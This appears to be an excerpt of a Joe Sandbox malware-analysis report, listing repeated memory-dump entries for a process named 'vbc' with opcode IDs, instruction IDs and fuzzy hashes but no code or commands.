                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33881e15a2ee7a13aca797a07478fd3fd37900debbaac01c0bba57b9f09e65ec
                                                                                    • Instruction ID: 12e56216ac1d412ec82d06aab42e9a79d13b656fd6990b70c23d10b244883751
                                                                                    • Opcode Fuzzy Hash: 33881e15a2ee7a13aca797a07478fd3fd37900debbaac01c0bba57b9f09e65ec
                                                                                    • Instruction Fuzzy Hash: 66110A72350B14FFD72256589C06F2BB699DBC4B60F110428BA88CB1C0DE74EC018696
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afe8c0367787a4ff8413513e86361003ff9ee5dff861ccf76c9e9a0515c9c05a
                                                                                    • Instruction ID: ae410a0e135585c68546ff4c05717e8841f6ea15c10786f7c4b1d695d5c7100f
                                                                                    • Opcode Fuzzy Hash: afe8c0367787a4ff8413513e86361003ff9ee5dff861ccf76c9e9a0515c9c05a
                                                                                    • Instruction Fuzzy Hash: 9E216A35200B009FCB29DF29C901B5677F5AF48B08F288569A949CBB61E671EC42CB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                    • Instruction ID: e9e8b6400ce1b33e070742116fcc6e043fd9a3bb19b1c96232eeb35389f0e9be
                                                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                    • Instruction Fuzzy Hash: 5C214772A00219AFDF129F98CD44BAEBBBAEB89310F200819FD55A7250D734DD509B54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f024bf538917ffaa4529b38bb5085c417f9743e1b8cc7dd7d5c0a10086ee8058
                                                                                    • Instruction ID: 4e1bbc39eee10c326fc35d26a437ad450093179e68c8a13c9fd36ddc9bc39592
                                                                                    • Opcode Fuzzy Hash: f024bf538917ffaa4529b38bb5085c417f9743e1b8cc7dd7d5c0a10086ee8058
                                                                                    • Instruction Fuzzy Hash: 6811B231700A149BCB11EF49C580A76B7F9FF8AB10B984469ED09EF205D6B2ED018F90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                    • Instruction ID: d8f1d0123fa6b3f111e6725b97eae0d056a00aa2a5b2d3751bbfa78046420f0f
                                                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                    • Instruction Fuzzy Hash: 8311D372600704EFE7269A48C849F9B7BBDEB80754F140029EA00DF290D6B1ED44CB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                    • Instruction ID: 7dfa4acceabdf4bfeadb4f572c0fb0db6f02850e1aa9ed3c37200a9f025f4609
                                                                                    • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                    • Instruction Fuzzy Hash: B4215075A04219AFCB05CF88C880DEEBBB9FF98304B1540A9E805A7351DA719E41CBA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0013b9c4b9838a64e6508440d52ae6ab003773a401251f4f4dfc2f809a7c2c56
                                                                                    • Instruction ID: d549530407c4664f826fdd454e3e73444e14b007267d515e3f86a97463d37495
                                                                                    • Opcode Fuzzy Hash: 0013b9c4b9838a64e6508440d52ae6ab003773a401251f4f4dfc2f809a7c2c56
                                                                                    • Instruction Fuzzy Hash: A4214975A4020ADFCB14DF98C581ABEBBB6FB88718F64456DD505AB310CB71AE06CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c0ee203a52f2cb6d95a264fa07ead456084afad801a28caf3811351939b2eac
                                                                                    • Instruction ID: f8694d9ea40d140a9b485dbd1691270b5300544e40a8deb04d96029edf8a48ff
                                                                                    • Opcode Fuzzy Hash: 5c0ee203a52f2cb6d95a264fa07ead456084afad801a28caf3811351939b2eac
                                                                                    • Instruction Fuzzy Hash: A0218E71614B04EFDB20CF69C881FA6B3F9FF44254F44892DE89AC7250EA70AC40CBA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 25c950967dc69ed713295b77655f86de2b4cb76cb3013d7cbc04c6c3af17e87c
                                                                                    • Instruction ID: 5584bda5a82a77bbeced5b11f7b10b2d0831e5e96139862be41b74324526d094
                                                                                    • Opcode Fuzzy Hash: 25c950967dc69ed713295b77655f86de2b4cb76cb3013d7cbc04c6c3af17e87c
                                                                                    • Instruction Fuzzy Hash: 3311B276A012459BDB24CF5AC580D9ABBE9AB84650F15417AED05DB310EA70DD00CB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c35155a539c524482268d197c688b9fddde74c0891665e8ff20870758aa5ac9e
                                                                                    • Instruction ID: 09d4531328e2bcec192ee01502d0032cb40ac62c0af51bceb9d6b4cd97f50af4
                                                                                    • Opcode Fuzzy Hash: c35155a539c524482268d197c688b9fddde74c0891665e8ff20870758aa5ac9e
                                                                                    • Instruction Fuzzy Hash: 5D1125353087146BD634B72DD889F36AB95EB80EA4F580027FE47D7284D9B0DC04C6A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    • Opcode ID: 2808078b04d4748392533e7517a1cf64ec0ddb7ecb4b384a10837ff02a0c5009
                                                                                    • Instruction ID: 8aba56834927e6f602f6874021911cd5790d5b89d482891387a87dbda8f73fa2
                                                                                    • Opcode Fuzzy Hash: 2808078b04d4748392533e7517a1cf64ec0ddb7ecb4b384a10837ff02a0c5009
                                                                                    • Instruction Fuzzy Hash: 88F0F932741B10B7C731DB5A8C44F27BAAAEB84F90F144428A906D7600CA30DD05DAA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b73be04372463d3c2e9631604b99cdcd6295f88c85bb26e3998b692a1a037749
                                                                                    • Instruction ID: a81e5a7c9769d03261f91349efd5912af3c28b9a13a621f0732a173f316955ea
                                                                                    • Opcode Fuzzy Hash: b73be04372463d3c2e9631604b99cdcd6295f88c85bb26e3998b692a1a037749
                                                                                    • Instruction Fuzzy Hash: ED0117B1A00209ABCB04DFA9D8559AEBBF8FF48304F10445AB905E7350DA74DA018BA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction ID: d26a864e4505500d1cbe5883a3129c0b2de7fe4f50b2d44df688f8fbced2de28
                                                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction Fuzzy Hash: A9F04FB3600A15ABD725CF4D9840E57F7EAEBC4A90F058169A955D7220EA31ED05CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction ID: 2e6638a7decba7cf68f9cf71df8589adfb60f1a8ffb8ce2dd935d83f8ad3686e
                                                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction Fuzzy Hash: 36F02173345B3A9BD73296AD5844F3BB696DFC1A64F190035FD19DB204C964CC0157D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ca27323679e43f9fe20564f72031f437d47483195710d37034d13235081c8e3
                                                                                    • Instruction ID: 01323895f4b06d3b23287f40b7cf787c443029b2b1ba3fbc54a3adf6fae59988
                                                                                    • Opcode Fuzzy Hash: 1ca27323679e43f9fe20564f72031f437d47483195710d37034d13235081c8e3
                                                                                    • Instruction Fuzzy Hash: 1F017171A0030C9BCB00DFA9D9959EEBBB8EF48310F10445AF905F7350DB34DA018BA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                                                    • Instruction ID: 86026646212b6515779c8983e761b57a49fead0f5806b3d8de13f73dc03723ca
                                                                                    • Opcode Fuzzy Hash: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                                                    • Instruction Fuzzy Hash: 56014F71A113499BCF04DFA9D855AEEBBB8EF48310F54405EF901EB290EB74EA01CB95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction ID: 0846669c1ce84a511b9869b64f4ef483dd531c8c159d727ec622d4ee106bfac0
                                                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction Fuzzy Hash: 87F06D7220011DBFEF029F94CD80DAF7B7DEB48298B144124FA0196060D731DD21ABA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                                                    • Instruction ID: 0d7cad569f7f7d5a02cc47ae4f8fbc62bd7992246419f21720abe5413738972a
                                                                                    • Opcode Fuzzy Hash: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                                                    • Instruction Fuzzy Hash: F4019736210209AFCF129F84DC40EDE3FAAFB4C764F069511FE1966260C636E970EB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                                                    • Instruction ID: 0524f104d8acca5ad070bafedfa71a42abf5783d1c11480ec22081b4dd6b7be6
                                                                                    • Opcode Fuzzy Hash: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                                                    • Instruction Fuzzy Hash: 7C018170308784DBF722976DCD48F7637A9BB44B04F480595BE12DB6E2FB68DD018211
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                                                    • Instruction ID: fdaf65abdefe448e91a01bc1ed04b34a3f2842505249bbf1c48055f11bf53826
                                                                                    • Opcode Fuzzy Hash: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                                                    • Instruction Fuzzy Hash: 29F090723042095BE624A6199C51F3237AAE7C06A5F65807AEF0ACB680FA71DC41C3B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction ID: 2b6edf620afaaa284ebc61a36b901344b592129171bb5d2d833112a9d44e97da
                                                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                    • Instruction Fuzzy Hash: AFF0E932385A3287DF36AA29C524B2EA29EFF80E00B05052C984BCB644DF60DC008780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17d794143f5a03115469b817eb997d69bc91b9a7c71a358149875159ec7e588c
                                                                                    • Instruction ID: 1dbe33cce5a306f642c863e6ff8bea2a97b28440f2be19331f5cccf7680b0444
                                                                                    • Opcode Fuzzy Hash: 17d794143f5a03115469b817eb997d69bc91b9a7c71a358149875159ec7e588c
                                                                                    • Instruction Fuzzy Hash: D0F05B327143485FD6217A189848B5BBBADFB94720F4A1917FC4567251CA306C82C690
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                                                    • Instruction ID: 887d62c935b71f4138a0ad27fa5f64cffb6ea11e989bacacec8b8bcf19514faa
                                                                                    • Opcode Fuzzy Hash: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                                                    • Instruction Fuzzy Hash: E2F06D329166D79EDF22EB588049F317795EB0872CF09496ADC8AC7521C624DC84C651
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                                                    • Instruction ID: 398a975111d84bbb50e956995eb78caa7ccbe6eff12a032ba48d15b08984bb99
                                                                                    • Opcode Fuzzy Hash: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                                                    • Instruction Fuzzy Hash: 63F0276652DB88CACF216B38A69EAA16F69A78A150F091446D5A25F200CA749C83CA24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                                                    • Instruction ID: 5b89fd7e91b0c6b4dd37f75869005e6ac164fa6ec91620df4e5126a8325999af
                                                                                    • Opcode Fuzzy Hash: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                                                    • Instruction Fuzzy Hash: B1F0BE716596529BE722D658C148FA273EDAB826A4F08A469DC06C7712C6A0DC80CA51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction ID: fa70030a53f05cc9213ffb19babc2621cb76aa70660924a6dd6ae1ddd58cc5bf
                                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction Fuzzy Hash: 1AE09232300A006BD7229E5D8C84F477B6EAF82B10F0400BDB9059E291C9F2DC0982A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                    • Instruction ID: f97ba0dfd2d25bcc9b7b5c32bec3f5cf3402d679a9f87bcfccd967cd8135bbb3
                                                                                    • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                    • Instruction Fuzzy Hash: 7BF0823230450AEFEB11AA5AD844EAEFB6AEFC5750F148052FD04CB350DBB1AC61CB51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                                                    • Instruction ID: 2ec687c182b35b2679de832b889812a9075ece3542d80deb6649aef055979654
                                                                                    • Opcode Fuzzy Hash: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                                                    • Instruction Fuzzy Hash: CF900236705810169140715848C4546816597E0301B95C011E5428554C8A188E5A5772
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                                                    • Instruction ID: bbf8ba88a1fb274a59711b18a01f4ca5c61e453653b30b8a8368fd4fb861e519
                                                                                    • Opcode Fuzzy Hash: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                                                    • Instruction Fuzzy Hash: FE90023634141406D14171584444606416997D0241FD5C012A5428554E86598F5AAE72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                                                    • Instruction ID: 80777464f571585b228dbded3418b91e4379c2ed1bde3d19b9f7f16d6d64267c
                                                                                    • Opcode Fuzzy Hash: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                                                    • Instruction Fuzzy Hash: C0900226342451565545B1584444507816697E02417D5C012A6418950C852A9D5ADA32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                                                    • Instruction ID: 6eee2d5bd513c969c15747496f5de73b317ab35cf18f2912cf08b23457f3e30f
                                                                                    • Opcode Fuzzy Hash: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                                                    • Instruction Fuzzy Hash: 7290022630545446D10075585448A06416587D0205F95D011A6068595DC6398D55A532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                                                    • Instruction ID: 7af9602417d6e23a4bbf4406c33290eaaf3951b048b3285e28e4960dd63e3798
                                                                                    • Opcode Fuzzy Hash: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                                                    • Instruction Fuzzy Hash: E890022E31341006D1807158544860A416587D1202FD5D415A5019558CC9198D6D5732
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                                                    • Instruction ID: cdb26f6e227286b0473984a3b44261aa9c250de689be34566b23059fff1747fb
                                                                                    • Opcode Fuzzy Hash: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                                                    • Instruction Fuzzy Hash: D790022630141007D140715854586068165D7E1301F95D011E5418554CD9198D5A5633
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
